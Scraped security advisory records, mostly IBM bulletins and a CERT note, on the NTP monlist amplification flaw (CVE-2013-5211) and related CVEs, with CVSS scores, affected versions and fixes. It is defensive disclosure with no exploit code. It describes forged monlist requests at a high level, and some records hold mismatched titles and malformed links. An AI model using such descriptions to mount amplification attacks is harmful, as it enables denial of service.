<https://community.rapid7.com/community/metasploit/blog/2014/08/25/r7-2014-12-more-amplification-vulnerabilities-in-ntp-allow-even-more-drdos-attacks>\n\n### Acknowledgements\n\nThanks to Christian Rossow for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-5211](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-5211>) \n---|--- \n**Date Public:** | 2014-01-02 \n**Date First Published:** | 2014-01-10 \n**Date Last Updated: ** | 2014-08-26 15:00 UTC \n**Document Revision: ** | 83 \n", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "cert", "title": "NTP can be abused to amplify denial-of-service attack traffic", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-08-26T15:00:00", "id": "VU:348126", "href": "https://www.kb.cert.org/vuls/id/348126", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2023-02-23T21:53:04", "description": "## Summary\n\nIBM Flex System Manager (FSM) is affected by a ntp vulnerability that could result in a denial of service\n\n## Vulnerability Details\n\n## Abstract\n\nIBM Flex System Manager (FSM) is affected by a ntp vulnerability that could result in a denial of service\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n \n**Description:** IBM Flex System Manager allows a remote attacker to use a valid NTP server to cause a potential denial of service attack by forging ntp requests. \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n \n\n\n## Affected products and versions\n\nFrom the FSM command line enter **lsconfig -V** to determine the level of FSM installed.\n\n * Flex System Manager 1.1.x.x\n * Flex System Manager 1.2.0.x\n * Flex System Manager 1.2.1.x\n * Flex System Manager 1.3.0.x\n * Flex System Manager 1.3.1.x\n\n**NON-AFFECTED PRODUCTS and VERSIONS**\n\nFlex System Manager 1.3.2.x\n\n## Remediation:\n\nProduct | VRMF | APAR | Remediation \n---|---|---|--- \nFlex System Manager | 1.1.x.x | IT00278 | Upgrade to FSM 1.3.2.0, or open a PMR with support to request an APAR \nFlex System Manager | 1.2.0.x | IT00278 | [ fsmfix1.2.0.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.0.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.2.1.x | IT00278 | [ fsmfix1.2.1.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.1.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.0.x | IT00278 | [ fsmfix1.3.0.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.0.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.1.x | IT00278 | [ fsmfix1.3.1.0_IT00252](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.1.0_IT00252&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \n \n## Workaround(s) & Mitigation(s):\n\nNone Known \n\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n * [OpenSSL Project vulnerability website](<http://www.openssl.org/news/vulnerabilities.html>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n01 July 2014: Original Copy Published \n\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: IBM Flex System Manager (FSM) is affected by vulnerability (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2019-01-31T01:25:01", "id": "604FCE50AACB68BB49851F3F38B3F43F31A200E4F5EBC74B2AAB98DFABBB21A9", "href": "https://www.ibm.com/support/pages/node/864974", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:53:06", "description": "## Summary\n\nA security vulnerability has been discovered in the Chassis Management Module NTP Server.\n\n## Vulnerability Details\n\n## Abstract\n\nA security vulnerability has been discovered in the Chassis Management Module NTP Server.\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n \n**Description:** The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:N/A:P)\n\n \n\n\n## Affected products and versions\n\n**Affected Products**\n\n * Flex System Chassis Management Module, Option part number 68Y7029\n * Flex System Enterprise Chassis, Types 7893, 8721, 8724\n\n**Affected Versions**\n\n * 2PET10A-1.0.0,\n * 2PET10B-1.1.0,\n * 2PET10C-1.1.1\n * 2PET10D-1.1.1\n * 2PET10E-1.1.1\n * 2PET10F-1.1.1,\n * 2PET10G-1.20.0,\n * 2PET10H-1.20.1,\n * 2PET10I-1.20.2,\n * 2PET10K-1.40.0,\n * 2PET10M,P-1.40.1,\n * 2PET10Q-1.40.2\n * 2PET12D \u2013 1.50.0\n * 2PET12E-1.50.0,\n * 2PET12F \u2013 1.50.1\n * 2PET12G \u2013 1.50.1\n * 2PET12H \u2013 1.50.1\n * 2PET12I-1.50.1\n\n## Remediation:\n\nIBM recommends updating to Chassis Management Module 2.0.0K (2PET12K) or newer, available on IBM Fix Central. \n \n\n\n## Workaround(s) & Mitigation(s):\n\nNone \n\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n20 June 2014: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: The IBM Chassis Management Module (CMM) is affected by a vulnerability in NTP server (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2019-01-31T01:25:01", "id": "AD1DA6D174199D25AADB2923BD8D4E1064EF1D68BE7B50CC5E7EA02064BA9498", "href": "https://www.ibm.com/support/pages/node/864954", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-13T13:36:21", "description": "## Summary\n\nThe NTP daemon on the TS7700 has the 'monlist' command enabled. This command returns a list of recent hosts that have connected to the service..\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n \n**DESCRIPTION:** \nNTP is vulnerable to a denial of service, caused by an error in the monlist feature in ntp_request.c. By sending a sending specially-crafted REQ_MON_GETLIST or REQ_MON_GETLIST_1 request, an attacker could exploit this vulnerability to consume available CPU resources and cause the server to crash. \n \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## Affected Products and Versions\n\nAll versions of microcode for the IBM Virtualization Engine TS7700 (3957-V06, 3957-V07, 3957-VEA, 3957-VEB) prior to release R2.1 are affected. In addition, microcode versions of releases R2.1, R3.0, R3.1 and R3.2 prior to and including the following are also affected: \n\n**Release**\n\n| **Version** \n---|--- \nR3.2| 8.32.0.84 \nR3.1| 8.31.1.4 \nR3.0| 8.30.2.23 \nR2.1| 8.21.0.178 \n \n## Remediation/Fixes\n\nContact IBM Service at 1-800-IBM-SERV to arrange an upgrade to the latest microcode level followed by the installation of vtd_exec.209. \n\n**Release**\n\n| **Fix** \n---|--- \nR3.2| 8.32.0.84 + vtd_exec.209 \nR3.1| 8.31.0.92 + vtd_exec.209 \nR3.0| 8.30.2.23 + vtd_exec.209 \nR2.1| 8.21.0.178 + vtd_exec.209 \nOlder Releases| 8.21.0.178 + vtd_exec.209 \n \n## Workarounds and Mitigations\n\nAlthough IBM recommends that you upgrade to the fixes identified above, you can mitigate, but not eliminate the risk of these vulnerabilities by restricting physical and network access to the TS7700 to authorized users and IBM Service Personnel only.\n\n## ", "cvss3": {}, "published": "2018-06-18T00:09:06", "type": "ibm", "title": "Security Bulletin: IBM Virtualization Engine TS7700 - The NTP monlist command is enabled (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2018-06-18T00:09:06", "id": "D93C9FB71BEABE16C18D831AAD49FD241CB228F6D7F68BB8ABFAAAD8C49505D2", "href": "https://www.ibm.com/support/pages/node/690201", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-09-12T13:52:50", "description": "## Summary\n\nAn interface on the IBM BladeCenter Advanced Management Module (AMM) may expose user account names and passwords that have been configured on that AMM.\n\n## Vulnerability Details\n\n## Abstract\n\nSecurity vulnerability has been discovered in NTP.\n\n## Content\n\n**Vulnerability Details:**\n\nCVE ID: [ ](<CVEID:%20CVE-2013-6718%20DESCRIPTION:%20An%20interface%20on%20the%20IBM%20BladeCenter%20Advanced%20Management%20Module%20\\(AMM\\)%20potentially%20exposes%20user%20account%20names%20and%20passwords%20that%20have%20been%20configured%20on%20that%20AMM.%20All%20configurations%20of%20the%20affected%20versions%20listed%20below%20contain%20the%20potential%20exposure.%20CVSS%20Base%20Score:%204.3%20CVSS%20Temporal%20Score:%20See%20http://xforce.iss.net/xforce/xfdb/89174%20for%20the%20current%20score%20CVSS%20Environmental%20Score*:%20Undefined%20CVSS%20Vector:%20\\(AV:N/AC:M/Au:N/C:P/I:N/A:N\\)>)[ \n_CVE-201__3-5211_](<https://vulners.com/cve/CVE-2013-5211>)\n\n**Description:** Remote attacker can use a valid NTP server to cause a potential denial of service attack by forging (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests to the server, causing the server to send a relatively large unsolicited amount of data to the IP address spoofed in the forged request.\n\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## **Affected products and versions**\n\nThese IBM BladeCenter Advanced Management Module Firmware versions are affected:\n\n * v3.66D (BPET66D, BBET66D, BPEO66D)\n\nThis applies to the following hardware products:\n\n * BladeCenter Advanced Management Module, Option 25R5778\n * BladeCenter T Advanced Management Module, Option 32R0835\n * IBM BladeCenter(TM)-E: Type 1881, 7967, 8677\n * IBM BladeCenter(TM)-H: Types 1886, 7989, 8852\n * IBM BladeCenter(TM)-HT: Types 8740, 8750\n * IBM BladeCenter(TM)-S: Types 1948, 7779, 8886\n * IBM BladeCenter(TM)-T: Types 8720, 8730\n\n## Remediation:\n\n**Vendor Fix:**\n\nIBM recommends applying Advanced Management Module firmware version v3.66E (BBET66E) for BladeCenter T Chassis, v3.66E(BEO66E for BladeCenter OEM Chassis and v3.66E (BPET66E) for v3.66E (BPET66E) for All other IBM BladeCenter Chassis.\n\n## Workaround(s) & Mitigation(s):\n\nNone known \n \n \nReferences:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n24 June 2014: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2023-04-14T14:32:25", "type": "ibm", "title": "Security Bulletin: IBM BladeCenter Advanced Management Module Account Information Exposure (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2013-6718"], "modified": "2023-04-14T14:32:25", "id": "1D5C9CF58B33AB7C86BF869E4AF3D2F7DE00446BE55E0024E770C2BB0C480912", "href": "https://www.ibm.com/support/pages/node/865100", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-23T21:44:03", "description": "## Summary\n\nAT&T has released versions 1801-zb for the Vyatta 5600. \n \nDetails of these releases can be found at https://cloud.ibm.com/docs/infrastructure/virtual-router-appliance?topic=virtual-router-appliance-at-t-vyatta-5600-vrouter-software-patches#at-t-vyatta-5600-vrouter-software-patches\n\n## Vulnerability Details\n\n#### Relevant CVE Information:\n\n**CVEID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n**DESCRIPTION:** NTP is vulnerable to a denial of service, caused by an error in the monlist feature in ntp_request.c. By sending a sending specially-crafted REQ_MON_GETLIST or REQ_MON_GETLIST_1 request, an attacker could exploit this vulnerability to consume available CPU resources and cause the server to crash. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2019-13272](<https://vulners.com/cve/CVE-2019-13272>) \n**DESCRIPTION:** Linux Kernel could allow a local attacker to gain elevated privileges on the system, caused by improper permission validation and improper object lifetime handling for PTRACE_TRACEME in the ptrace_link function. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain root privileges on the system. \nCVSS Base Score: 7.4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/163733> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nVRA - Vyatta 5600\n\n## Remediation/Fixes\n\nPlease contact IBM Cloud Support to request that the ISO for the 1801-za be pushed to your Vyatta system. Users will need to apply the upgraded code according to their defined processes (for example during a defined maintenance window).\n\n## ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-11T17:35:09", "type": "ibm", "title": "Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2019-13272"], "modified": "2019-09-11T17:35:09", "id": "24400C9D70BA9E11A467C03D5072550ABC0427709E1B129CDE6B8C00AC26633B", "href": "https://www.ibm.com/support/pages/node/1073548", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T06:08:35", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in the libxml2 component of IBM Security Network Intrusion Prevention System.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2014-0191 _](<https://vulners.com/cve/CVE-2014-0191>)\n\n**DESCRIPTION: **\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion of internal entities within the xmlParserHandlePEReference() function. A remote attacker could exploit this vulnerability using a specially-crafted XML document containing malicious attributes to consume all available CPU resources.\n\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/93092_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93092>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID: **[_CVE-2013-2877 _](<https://vulners.com/cve/CVE-2013-2877>)\n\n**DESCRIPTION: **\n\nGoogle Chrome is vulnerable to a denial of service, caused by an out-of-bounds read in XML parsing. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to cause a denial of service. \n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85531_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85531>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n**CVEID: **[_CVE-2014-3660 _](<https://vulners.com/cve/CVE-2013-3660>)\n\n**DESCRIPTION:**\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion of recursive entities. A remote attacker could exploit this vulnerability using a specially-crafted XML document processed by an application using libxml2 to consume all available CPU resources. \n \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/97656_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/97656>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## Affected Products and Versions\n\nProducts: GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000 \n\nFirmware versions: 4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3\n\n## Remediation/Fixes\n\n_The following IBM Threat Fixpacks have the fixes for these vulnerabilities. You can download them from the following links:_\n\n_Product_| _VRMF_| _Remediation/First Fix_ \n---|---|--- \n_IBM Security Network Intrusion Prevention System_| _4.6.2.0_| [4.6.2.0-ISS-ProvG-AllModels-System-FP0004](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.6.1.0_| [__4.6.1.0-ISS-ProvG-AllModels-System-FP0008__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.6.0.0_| [4.6.0.0-ISS-ProvG-AllModels-System-FP0006](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.5.0.0_| [_4.5.0.0-ISS-ProvG-AllModels-System-FP0008_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.4.0.0_| [4.4.0.0-ISS-ProvG-AllModels-System-FP0008](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.3.0.0_| [__4.3.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2022-02-23T19:48:26", "type": "ibm", "title": "Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2877", "CVE-2013-3660", "CVE-2013-5211", "CVE-2014-0191", "CVE-2014-3660"], "modified": "2022-02-23T19:48:26", "id": "62699243F13608A014B52BC4C1F8BC188D617A0752C1A98F1E8CDB722F068C0E", "href": "https://www.ibm.com/support/pages/node/522823", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:53:07", "description": "## Summary\n\nThree potential vulnerabilities have been discovered in IBM GCM16/GCM32 Global Console Manager KVM Switches\n\n## Vulnerability Details\n\n## Abstract\n\nThree potential vulnerabilities have been discovered in IBM GCM16/GCM32 Global Console Manager KVM Switches\n\n## Content\n\n**Vulnerability Details:**\n\nCVE ID: [ ](<CVEID:%20CVE-2013-6718%20DESCRIPTION:%20An%20interface%20on%20the%20IBM%20BladeCenter%20Advanced%20Management%20Module%20\\(AMM\\)%20potentially%20exposes%20user%20account%20names%20and%20passwords%20that%20have%20been%20configured%20on%20that%20AMM.%20All%20configurations%20of%20the%20affected%20versions%20listed%20below%20contain%20the%20potential%20exposure.%20CVSS%20Base%20Score:%204.3%20CVSS%20Temporal%20Score:%20See%20http://xforce.iss.net/xforce/xfdb/89174%20for%20the%20current%20score%20CVSS%20Environmental%20Score*:%20Undefined%20CVSS%20Vector:%20\\(AV:N/AC:M/Au:N/C:P/I:N/A:N\\)>)[](<https://vulners.com/cve/CVE-2013-5211>)[__CVE-2014-3085__](<https://vulners.com/cve/CVE-2014-3085>)\n\n**Description:** Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. \nCVSS Base Score: 7.1 \nCVSS Temporal Score: See _<http://xforce.iss.net/xforce/xfdb/94091>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:H/Au:S/C:C/I:C/A:C)\n\n**CVEID:** [__ CVE-2014-3081__](<https://vulners.com/cve/CVE-2014-3081>)\n\n**Description:** IBM GCM16 and GCM32 contain a vulnerability that would allow a remote authenticated attacker to read any file on the system. \nCVSS Base Score: 6.3 \nCVSS Temporal Score: See _<http://xforce.iss.net/xforce/xfdb/93930>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:C/I:N/A:N)\n\n \n**CVEID:** [__ CVE-2014-3080__](<https://vulners.com/cve/CVE-2014-3080>)\n\n**Description:** GCM16 and GCM32 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See _<http://xforce.iss.net/xforce/xfdb/93929>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n## **Affected products and versions**\n\n * IBM Global 2x2x16 Console Manager (GCM16)\n * IBM Global 4x2x32 Console Manager (GCM32)\n * Firmware versions 1.20.0.22575 and earlier\n\n## Remediation:\n\nIBM recommends updating to firmware version 1.20.20.23447 or newer, available on IBM Fix Central.\n\n## Workaround(s) & Mitigation(s):\n\nNone known\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web 